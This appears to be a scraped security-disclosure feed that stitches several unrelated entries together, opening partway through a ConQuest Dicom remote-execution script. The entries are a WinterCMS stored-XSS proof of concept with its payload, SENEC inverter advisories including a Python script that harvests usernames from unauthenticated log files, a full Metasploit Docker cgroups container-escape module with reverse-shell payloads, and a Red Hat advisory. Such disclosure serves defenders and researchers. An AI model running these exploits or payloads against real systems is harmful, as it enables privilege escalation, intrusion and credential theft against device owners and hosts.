    #s.sendall( pkt5 ) 

    allpkts = pkt1 + pkt2 + pkt3 + pkt4 + pkt5  
    s.sendall(allpkts)

    print("! should be done :|")

ConQuest Dicom Server 1.5.0d Remote Command Execution

WinterCMS version 1.2.3 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in WinterCMS 1.2.3 Plugin Components# Date: 12/7/2023# Exploit Author: tmrswrr# Vendor Homepage: https://wintercms.com/# Software Link: https://github.com/wintercms/winter# Version: 1.2.3# Tested on: debian 9PoC   1. Access the WinterCMS backend at http://localhost/backend/cms.   2. Navigate to the Plugin Components section.   3. In the Markup Code input field, insert the following payload:   "<sVg/onLy=1 onLoaD=confirm(1)//".   4. Save the input and click on the "Preview" button.   5. The injected script executes, demonstrating the XSS vulnerability.

WinterCMS 1.2.3 Cross Site Scripting

The affected devices transmit sensitive information unencrypted allowing a remote unauthenticated attacker to capture and modify network traffic.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:13:23 +0000  

> > Advisory ID: Ph0s-2023-004
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-319: Cleartext Transmission of Sensitive Information

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N (8.1 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L/E:F/RL:U/RC:C
> > Overall CVSS Score: 7.4

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39172
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > The management interface of the SENEC.Inverter transmits security-critical data
> > (authentication credentials) in cleartext in a communication channel that can be
> > sniffed by unauthorized actors. For example, in networking, packets can traverse
> > many intermediary nodes from the source to the destination, whether across the
> > internet or an internal network. Some actors might have privileged access to a
> > network interface or any link along the channel, such as a router. As a result,
> > network traffic could be sniffed by adversaries, spilling security-critical data.
> > Incidentally, this refers not only to remote maintenance of the photovoltaic
> > system, but also to on-site configuration by a technician at the customer’s
> > premises. Due to the lack of transport encryption, a technically skilled
> > customer is therefore also able to gather authentication credentials by
> > intercepting network traffic, e.g. at the central network gateway.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > n/a, simply sniff the network

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials - CVE-2023-39172** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39172: Full Disclosure: Senec Inverters Home V1, V2, V3 Home & Hybrid Cleartext Transmission of Authentication Credentials

In SENEC Storage Box V1,V2 and V3 an unauthenticated remote attacker can obtain the devices' logfiles that contain sensitive data.

**Full Disclosure mailing list archives**

_From_: Phos4Me via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Fri, 10 Nov 2023 07:12:01 +0000  

> > Advisory ID: Ph0s-2023-002
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-200: Exposure of Sensitive Information to an
> > Unauthorized Actor

> > Risk Level: CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5 High)

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C
> > Overall CVSS Score: 7.2

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39168
> > Author of Advisory: Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. we would like to
> > thank enbw-cert for taking care of the vulns and patch the systems.
> > we decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

> > About Senec:
> > We are SENEC

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don’t do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.

> > About SENEC Home:

> > SENEC.Home: The smart electricity storage device for your home

> > SENEC.Home is the heart of the your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household’s energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Vulnerability Details:

> > As already stated in CVE-2023-39167, no authentication is required to access log
> > information. Therefore, and due to the predictable URL scheme, it is possible
> > for an attacker to download all existing log files to obtain the username.

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Proof of Concept (PoC):

> > The attack consists of the following steps:

> > 1\. parse the script using this PoC Code to obtail the username:
> > import argparse
> > import datetime
> > import os
> > import requests

> > def get\_senec\_logs(senec\_ip, day\_range, break\_on\_username):
> > start\_date = datetime.datetime.today()
> > end\_date = start\_date - datetime.timedelta(days=day\_range)
> > delta = datetime.timedelta(days=1)

> > while end\_date < start\_date:
> > try:
> > senec\_url = f"http://{senec\_ip}/log/{start\_date.strftime('%Y')}/" \\
> > f"{start\_date.strftime('%m')}/{start\_date.strftime('%d')}.log"
> > r = requests.get(senec\_url)
> > print(f"HTTP Status Code {r.status\_code}: {senec\_url}")

> > if r.status\_code != 200: break
> > if r.headers\["Content-Length"\] == "0": break

> > os.makedirs(os.path.dirname(senec\_url.replace("http://";, "")), exist\_ok=True)
> > with open(senec\_url.replace("http://";, ""), "wb") as senec\_log\_file:
> > senec\_log\_file.write(r.content)
> > offset = r.content.find(bytes("username:", "utf-8"))
> > if offset != -1:
> > print(f"Username found in {senec\_log\_file.name} at offset {offset}")
> > if break\_on\_username: break
> > except requests.ConnectionError:
> > print("Failed to connect to SENEC.Inverter")
> > break
> > except Exception as e:
> > print(f"An unhandled exception occurred:\\n{e}")
> > break
> > start\_date -= delta

> > if name == 'main':
> > parser = argparse.ArgumentParser(description="Download SENEC.Inverter log files")
> > parser.add\_argument("ip", type=str, help="IP address of the target SENEC.Inverter")
> > parser.add\_argument("-b", "--break-on-username", action="store\_true", default=False, required=False,
> > help="stop downloading once a username is found")
> > parser.add\_argument("-d", "--day-range", type=int, action="store", default=365 \* 20, required=False,
> > help="number of days to download log files in reverse order starting today")
> > args = parser.parse\_args()
> > get\_senec\_logs(args.ip, args.day\_range, args.break\_on\_username)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Disclosure Timeline:

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Researcher:
> > Ph0s\[4\], R0ckE7

> > \*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

> > Disclaimer:

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.

> > \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> > Copyright:

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/

**Attachment: publickey - Phos4Me@proton.me - 0x3F4F673D.asc**  
_Description:_

**Attachment: signature.asc**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor - CVE-2023-39168** _Phos4Me via Fulldisclosure (Nov 12)_

CVE-2023-39167: Full Disclosure: Senec Inverters Home V1, V2, V3 Home & Hybrid Exposure of the Username to an Unauthorized Actor

This Metasploit exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability. If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system. A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  include Msf::Post::Linux::Priv  include Msf::Post::Linux::Kernel  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Docker cgroups Container Escape',        'Description' => %q{          This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.          If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.          A vulnerability was found in the Linux kernel's cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function.          This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges          and bypass the namespace isolation unexpectedly.          More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates.          If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file,          an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent          file is owned by root, so only a user with root access can modify it.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Yiqi Sun', # discovery          'Kevin Wang', # discovery          'T1erno', # POC        ],        'Platform' => [ 'unix', 'linux' ],        'SessionTypes' => ['meterpreter'],        'DefaultOptions' => {          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'        },        'Privileged' => true,        'References' => [          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=24f6008564183aa120d07c03d9289519c2fe02af'],          [ 'URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],          [ 'URL', 'https://github.com/T1erno/CVE-2022-0492-Docker-Breakout-Checker-and-PoC'],          [ 'URL', 'https://github.com/PaloAltoNetworks/can-ctr-escape-cve-2022-0492'],          [ 'URL', 'https://github.com/SofianeHamlaoui/CVE-2022-0492-Checker/blob/main/escape-check.sh'],          [ 'URL', 'https://pwning.systems/posts/escaping-containers-for-fun/'],          [ 'URL', 'https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html'],          [ 'URL', 'https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation'],          [ 'URL', 'https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/'],          [ 'CVE', '2022-0492']        ],        'DisclosureDate' => '2022-02-04',        'Targets' => [          ['BINARY', { 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } }],          ['CMD', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])    ]  end  def base_dir    datastore['WritableDir']  end  def check    print_status('Unable to determine host OS, this check method is unlikely to be accurate if the host isn\'t Ubuntu')    release = kernel_release    # https://people.canonical.com/~ubuntu-security/cve/2022/CVE-2022-0492    release_short = Rex::Version.new(release.split('-').first)    release_long = Rex::Version.new(release.split('-')[0..1].join('-'))    if release_short >= Rex::Version.new('5.13.0') && release_long < Rex::Version.new('5.13.0-37.42') || # Ubuntu 21.10       release_short >= Rex::Version.new('5.4.0') && release_long < Rex::Version.new('5.4.0-105.119') || # Ubuntu 20.04 LTS       release_short >= Rex::Version.new('4.15.0') && release_long < Rex::Version.new('4.15.0-173.182') || # Ubuntu 18.04 LTS       release_short >= Rex::Version.new('4.4.0') && release_long < Rex::Version.new('4.4.0-222.255') # Ubuntu 16.04 ESM      return CheckCode::Vulnerable("IF host OS is Ubuntu, kernel version #{release} is vulnerable")    end    CheckCode::Safe("Kernel version #{release} may not be vulnerable depending on the host OS")  end  def exploit    # Check if we're already root as its required    fail_with(Failure::NoAccess, 'The exploit needs a session as root (uid 0) inside the container') unless is_root?    # create mount    folder = rand_text_alphanumeric(5..10)    @mount_dir = "#{base_dir}/#{folder}"    register_dir_for_cleanup(@mount_dir)    vprint_status("Creating folder for mount: #{@mount_dir}")    mkdir(@mount_dir)    print_status('Mounting cgroup')    cmd_exec("mount -t cgroup -o rdma cgroup '#{@mount_dir}'")    group = rand_text_alphanumeric(5..10)    group_full_dir = "#{@mount_dir}/#{group}"    vprint_status("Creating folder in cgroup for exploitation: #{group_full_dir}")    mkdir(group_full_dir)    print_status("Enabling notify on release for group #{group}")    write_file("#{group_full_dir}/notify_on_release", '1')    print_status('Determining the host OS path for image')    # for this, we need the line that starts with overlay, and contains an 'upperdir' parameter, which we want the value of    mtab_file = read_file('/etc/mtab')    host_path = nil    mtab_file.each_line do |line|      next unless line.start_with?('overlay') && line.include?('perdir') # upperdir      line.split(',').each do |parameter|        next unless parameter.start_with?('upperdir')        parameter = parameter.split('=')        fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1        host_path = parameter[1]      end      break    end    fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command    vprint_status("Host OS path for image: #{host_path}")    payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"    print_status("Setting release_agent path to: #{host_path}#{payload_path}")    write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"    print_status("Uploading payload to #{payload_path}")    if target.name == 'CMD'      # for whatever reason it's unhappy and wont run without the /bin/sh header      upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"    elsif target.name == 'BINARY'      upload_and_chmodx payload_path, generate_payload_exe    end    register_files_for_cleanup(payload_path)    print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")    cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))  end  def cleanup    if @mount_dir      vprint_status("Cleanup: Unmounting #{@mount_dir}")      cmd_exec("umount '#{@mount_dir}'")    end    super  endend

Docker cgroups Container Escape

Red Hat Security Advisory 2023-7678-03 - Red Hat AMQ Streams 2.6.0 is now available from the Red Hat Customer Portal. Issues addressed include XML injection, bypass, and open redirection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7678.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat AMQ Streams 2.6.0 release and security update  
Advisory ID:        RHSA-2023:7678-03  
Product:            Red Hat JBoss AMQ  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7678  
Issue date:         2023-12-07  
Revision:           03  
CVE Names:          CVE-2022-46751  
====================================================================

Summary: 

Red Hat AMQ Streams 2.6.0 is now available from the Red Hat Customer Portal.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. 

This release of Red Hat AMQ Streams 2.6.0 serves as a replacement for Red Hat AMQ Streams 2.5.1, and includes security and bug fixes, and enhancements.

Security Fix(es):

* JSON-java: parser confusion leads to OOM (CVE-2023-5072)

* spring-boot: Security Bypass With Wildcard Pattern Matching on Cloud Foundry (CVE-2023-20873)

* zookeeper: Authorization Bypass in Apache ZooKeeper (CVE-2023-44981)

* apache-ivy: XML External Entity vulnerability (CVE-2022-46751)

* guava: insecure temporary directory creation (CVE-2023-2976)

* jose4j: Insecure iteration count setting (CVE-2023-31582)

* bouncycastle: potential blind LDAP injection attack using a self-signed certificate (CVE-2023-33201)

* jetty: Improper validation of HTTP/1 content-length (CVE-2023-40167)

* tomcat: Open Redirect vulnerability in FORM authentication (CVE-2023-41080)

* gradle: Possible local text file exfiltration by XML External entity injection (CVE-2023-42445)

* gradle: Incorrect permission assignment for symlinked files used in copy or archiving operations (CVE-2023-44387)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2022-46751

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.streams&version=2.6.0  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2215465  
https://bugzilla.redhat.com/show_bug.cgi?id=2231491  
https://bugzilla.redhat.com/show_bug.cgi?id=2233112  
https://bugzilla.redhat.com/show_bug.cgi?id=2235370  
https://bugzilla.redhat.com/show_bug.cgi?id=2239634  
https://bugzilla.redhat.com/show_bug.cgi?id=2242485  
https://bugzilla.redhat.com/show_bug.cgi?id=2242538  
https://bugzilla.redhat.com/show_bug.cgi?id=2243436  
https://bugzilla.redhat.com/show_bug.cgi?id=2246370  
https://bugzilla.redhat.com/show_bug.cgi?id=2246417

Tag

#auth